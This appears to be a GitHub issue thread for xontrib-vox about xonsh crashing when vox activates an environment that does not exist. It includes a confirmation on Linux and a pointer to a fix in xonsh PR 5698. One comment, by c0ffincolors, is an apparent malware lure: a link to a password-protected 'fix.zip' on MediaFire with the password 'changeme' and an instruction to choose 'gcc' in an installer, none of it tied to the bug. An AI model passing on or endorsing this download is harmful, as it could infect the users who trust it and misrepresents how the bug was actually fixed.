### ISSUE TITLE
Activating a non-existent environment causes xonsh to crash

### ISSUE THREAD

**Issue by Spitfire1900** [xonsh/xontrib-vox#12]
Reproduced with xonsh on Windows Terminal

```
@ vox activate i_do_not_exist
Error: This environment doesn't exist. Create it with "vox new i_do_not_exist"
Return None



[process exited with code 1 (0x00000001)]
You can now close this terminal with Ctrl+D, or press Enter to restart.
```

On Windows 11 using xonsh 0.18.3 and xontrib-vox 0.0.1

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tacaswell** [comment]
I see the same behavior on linux.

**Comment by yaxollum** [comment]
Fixed in https://github.com/xonsh/xonsh/pull/5698
